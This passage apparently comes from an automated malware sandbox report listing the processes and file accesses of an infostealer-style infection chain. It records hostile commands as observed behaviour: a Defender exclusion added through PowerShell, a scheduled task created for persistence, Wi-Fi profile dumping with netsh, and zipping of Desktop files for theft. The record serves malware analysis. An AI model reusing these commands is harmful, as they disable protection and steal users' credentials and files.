Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe "C:\Users\user\AppData\Local\Temp\1000071001\jok.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe "C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: unknown unknown
Source: C:\Users\user\1000021002\ac861238af.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe "C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Process created: C:\Users\user\AppData\Local\Temp\u6po.0.exe "C:\Users\user\AppData\Local\Temp\u6po.0.exe"
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe" -Force
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: ac861238af.exe, 00000010.00000000.1932011901.0000000000762000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RageMP131.exe, 0000002E.00000002.2634385282.0000000000BB0000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: QProgram Manager
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\1000021002\ac861238af.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Queries volume information: C:\Users\user\1000021002\ac861238af.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000081001\install.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000081001\install.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: unknown VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000236001\4767d2e713f2021e8fe856e3ea638b58.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000236001\4767d2e713f2021e8fe856e3ea638b58.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
